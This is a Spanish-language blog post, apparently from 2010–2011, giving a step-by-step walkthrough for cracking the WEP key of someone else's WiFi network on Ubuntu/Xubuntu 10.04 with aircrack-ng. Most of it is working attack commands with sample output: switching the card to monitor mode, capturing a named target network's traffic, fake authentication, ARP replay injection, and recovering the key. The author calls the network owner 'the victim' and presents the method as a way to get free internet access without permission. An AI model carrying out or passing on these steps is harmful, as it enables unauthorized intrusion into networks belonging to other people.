Encontrar claves de WiFi o Wi-Fi con cifrado WEP en Ubuntu 10.04

Actualización (14 febrero 2011):

Realmente el proceso lo hice en xubuntu 10.04, asumí que funcionaba igual por ser mism@ sistema operativo distribución ubuntu, así que si no se quieren complicar por el siguiente error, utilicen una live CD o USB de xubuntu para hacer el proceso.

— El error es Channel Fixed : -1 , es decir no trabaja en el canal que le indicamos y es por culpa de algunos procesos de gnome, ejemplo cuando sale algo así:

Found 4 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID    Name
1000    NetworkManager
1001    avahi-daemon
1004    avahi-daemon
1136    wpa_supplicant

++++ Pronto les diré como solucionar esto ++++

Saludos,

A veces es muy útil cuando estamos en algún lugar y nos urge conectarnos a la red de redes y no tenemos opciones cercanas (cafe’s internet, o se nos quedó el modem, etc) , entonces hacemos uso de esto sin abusar.

El proceso es el siguiente:

1. Necesitamos instalar el paquete aircrack-ng para hacer todo el procedimiento, abrir una consola y ejecutar esto:

sudo apt-get install aircrack-ng

Si no tienes internet, descarga los paquetes y los instalas en este orden:

iw_0.9.14-1_i386.deb

aircrack-ng_1.0-1_i386.deb

Para no estar escribiendo sudo en los comandos que siguen, voy a asumir que tienen la consola en modo super usuario es decir, #

2. Luego, debemos saber como se llama el identificador de nuestra red inalámbrica

# iwconfig

En mi caso se llama wlan0

3. Ahora vamos a ver cual es nuestra MAC:

# ifconfig

Entonces anotamos la secuencia que dice direcciónHW que tiene como estructura 1a:2b:3c:4d:5e:f6 (esto es un ejemplo)  lógicamente la de nuestra wlan0 en mi caso.

4. Empezamos el proceso, con el siguiente comando airmon-ng start (nombre de nuestro identificador):

# airmon-ng start wlan0

Esto va a hacer que nuestro adaptador entre en modo monitor y creará un identificador mon0

5. Ahora buscamos las redes que están a nuestro alcance:

# airodump-ng mon0

Ejemplo la red Bavare de esta imagen, de las cuales los datos importantes a anotar son: BSSID, canal (CH), ESSID y que sea WEP el tipo de cifrado (CIPHER) y algo muy importante es que hayan estaciones conectadas a la red eso facilita todo.. ejemplo miren que hay 3 clientes asociados a la red Bavare, tomen nota de la MAC (STATION) de alguno de ellos también, ejemplo 00:17:C4:85:2B:EB

Cuando obtengan algo parecido y anoten esos datos, paren este proceso con Ctrl + C

6. Sigue lo siguiente, airodump-ng -c (canal o CH) -w (nombre del archivo cualquiera para captura) mon0

# airodump-ng -c 1 -w datos mon0

Con esto escucharemos esa red y empezaremos a capturar paquetes en el archivo «datos«

DEJAR ESTE PROCESO CORRIENDO EN ESA CONSOLA

7. Ahora abrimos otra consola y hacemos, aireplay-ng -1 6000 -q 10 -o 1 -e (ESSID de la victima) -a (MAC de nuestra victima o BSSID) -h (nuestra MAC) mon0

# aireplay-ng -1 6000 -q 10 -o 1 -e Bavare -a 00:02:CF:BB:C3:93 -h 1a:2b:3c:4d:5e:f6 mon0

DEJAR ESTE PROCESO CORRIENDO EN ESA CONSOLA

Les debe salir algo parecido a esto:

23:49:55  Waiting for beacon frame (BSSID: -- aquí va la mac que salga --) on channel 1

23:49:55  Sending Authentication Request (Open System) [ACK]
23:49:55  Authentication successful
23:49:55  Sending Association Request [ACK]
23:49:55  Association successful :-) (AID: 1)

23:50:05  Sending keep-alive packet [ACK]
23:50:15  Sending keep-alive packet [ACK]

8.  Abrimos otra consola con, aireplay-ng -3 -b (MAC de la victima o BSSID) -h (Nuestra MAC) mon0

# aireplay-ng -3 -b 00:02:CF:BB:C3:93 -h 1a:2b:3c:4d:5e:f6 mon0

DEJAR ESTE PROCESO CORRIENDO EN ESA CONSOLA

Les debe salir algo parecido a esto:

23:51:40  Waiting for beacon frame (BSSID: -- aquí va la mac que salga --) on channel 1
Saving ARP requests in replay_arp-0213-235140.cap
You should also start airodump-ng to capture replies.
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
957423 packets (got 235119 ARP requests and 283871 ACKs), sent 296016 packets...(500 pps)

Toca esperar a que la red capture entre 30.000 y 150.000 paquetes, eso lo ven en la imagen de arriba que dice #Data de la red Bavare

9.  Abrimos otra consola para descifrar la clave, este es el paso final.. les recomiendo esperar a los 150.000 paquetes para ser más efectivos,

# aircrack-ng *.cap

Si hay más de una red en el canal que estamos trabajando es normal que les pregunte que elijan la red, el número de la lista que les ofrece, lo digitan o presionan (y)

Eso nos debe dar un resultado de KEY FOUND como la siguiente imagen

10.  Ahora solo toca parar el estado del adaptador como monitor.

# airmon-ng stop mon0

# airmon-ng stop wlan0

11.  Desactivan y Activan la red inalámbrica en el ícono de red de ubuntu (Click derecho -> Activar red) e intentan conectarse a la red Bavare con la clave encontrada y cuando se conecte probamos que tenga internet.. a disfrutar!!

Esto lo vi y con video en : http://www.mijail.com.ve/2010/07/clave-wi-fi/